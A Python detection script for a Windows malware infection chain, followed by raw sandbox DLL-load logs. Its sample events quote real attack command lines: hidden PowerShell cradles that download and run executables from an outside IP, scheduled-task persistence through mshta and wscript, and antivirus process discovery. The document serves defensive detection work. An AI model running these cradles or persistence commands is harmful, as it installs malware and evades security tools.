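CMD, SCHT = r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\schtasks.exe"
SAMPLE_EVENTS = [  # constructed from the report lines; not a machine export
    ProcEvent(MSHTA, PS, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;'''),
    ProcEvent(MSHTA, PS, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;'''),
    ProcEvent(CMD, SCHT, r'''schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f'''),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\764661\Macromedia.com", SCHT,
              r'''schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST'''),
    ProcEvent(CMD, r"C:\Windows\SysWOW64\findstr.exe", r'findstr /I "opssvc wrsa"'),
    ProcEvent(CMD, r"C:\Windows\SysWOW64\findstr.exe", r'findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"'),
    ProcEvent(CMD, CMD, r"cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com"),
    ProcEvent(CMD, r"C:\Windows\SysWOW64\timeout.exe", r"timeout /t 2"),  # control: no rule should fire
]

SCRIPT_HOSTS = {"mshta", "wscript", "cscript", "powershell", "rundll32", "regsvr32"}  # assumed list
AV_PROCESS_NAMES = {"opssvc", "wrsa", "avastui", "avgui", "bdservicehost",  # the names the sample's
                    "nswscsvc", "ekrn", "sophoshealth"}                     # own findstr calls use
URL_RE = re.compile(r"""https?://[^\s'")]+""", re.I)
CRADLE_RE = re.compile(r"DownloadFile\(|DownloadString\(|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
EXEC_RE = re.compile(r"Start-Process|Invoke-Expression|\biex\b|Invoke-Item", re.I)


def _base(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def _switch(cmdline: str, name: str) -> str | None:
    """Value of a schtasks /<name> switch, whether quoted or bare."""
    m = re.search(rf'/{name}\s+(?:"([^"]*)"|(\S+))', cmdline, re.I)
    return None if not m else (m.group(1) if m.group(1) is not None else m.group(2))


def resolve_cradle_drop_path(cmdline: str, temp_dir: str) -> str | None:
    """Replay PowerShell's $env:temp+'<literal>' concatenation: no separator is
    inserted, so a literal without a leading backslash lands beside %TEMP%
    (the TempMHLZ...EXE path in this report), not inside it."""
    m = re.search(r"\$env:temp\+'([^']+)'", cmdline, re.I)
    return temp_dir + m.group(1) if m else None


def detect(ev: ProcEvent) -> list[str]:
    """Names of the rules that fire for one event (empty list when none do)."""
    hits: list[str] = []
    parent, child, cl = _base(ev.parent), _base(ev.image), ev.cmdline
    parent_host = parent[:-4] if parent.endswith(".exe") else parent
    # 1. Fetch-and-run cradle in PowerShell; named after the script host that spawned it.
    if child == "powershell.exe" and CRADLE_RE.search(cl) and EXEC_RE.search(cl):
        name = "powershell_download_execute"
        if parent_host in SCRIPT_HOSTS:
            name = f"{parent_host}_spawns_{name}"
        hits.append(f"{name}: {' '.join(URL_RE.findall(cl)) or '<no url>'}")
    # 2. Scheduled task whose action is a script host (/mo 25 .hta replay, onlogon .js).
    if child == "schtasks.exe" and "/create" in cl.lower():
        words = (_switch(cl, "tr") or "").split()
        host = words[0].lower() if words else ""
        host = host[:-4] if host.endswith(".exe") else host
        if host in SCRIPT_HOSTS:
            sc = re.search(r"/sc\s+(\w+)", cl, re.I)
            mo = re.search(r"/mo\s+(\d+)", cl, re.I)
            rl = re.search(r"/rl\s+(\w+)", cl, re.I)
            sched = (sc.group(1).lower() if sc else "?") + (f"/{mo.group(1)}" if mo else "")
            msg = f"scheduled_task_script_host: task={_switch(cl, 'tn')} host={host} sched={sched}"
            hits.append(msg + (f" rl={rl.group(1).upper()}" if rl else ""))
    # 3. Security-product discovery: tasklist output grepped for known AV process names.
    if child == "findstr.exe":
        seen = [t.lower() for t in re.findall(r"[A-Za-z0-9_]+", cl) if t.lower() in AV_PROCESS_NAMES]
        if seen:
            hits.append("av_process_discovery: " + ",".join(dict.fromkeys(seen)))
    # 4. Payload rebuilt from innocuously named fragments with copy /b.
    m = re.search(r"\bcopy\s+/b\b", cl, re.I)
    if child == "cmd.exe" and m:
        rest = cl[m.end():]
        hits.append(f"binary_fragment_reassembly: {rest.count('+') + 1} fragments -> {rest.split()[-1]}")
    return hits


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Event index -> rule hits, for the events that fired at least one rule."""
    return {i: hits for i, ev in enumerate(events) if (hits := detect(ev))}


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(f"[{i}] {_base(SAMPLE_EVENTS[i].parent)} -> {_base(SAMPLE_EVENTS[i].image)}: {'; '.join(hits)}")
    print("cradle 0 drops to", resolve_cradle_drop_path(SAMPLE_EVENTS[0].cmdline, r"C:\Users\user\AppData\Local\Temp"))
```

Rule 1 keys on the combination of a download primitive and an execution primitive in one PowerShell command line, so a plain DownloadFile used by an installer does not fire; rule 2 reads the /tr action rather than the task name, because the names here (mS3R9maupm1, Z94szma4HiI, j1HKkma32Vn) are random per run and useless as indicators.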
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
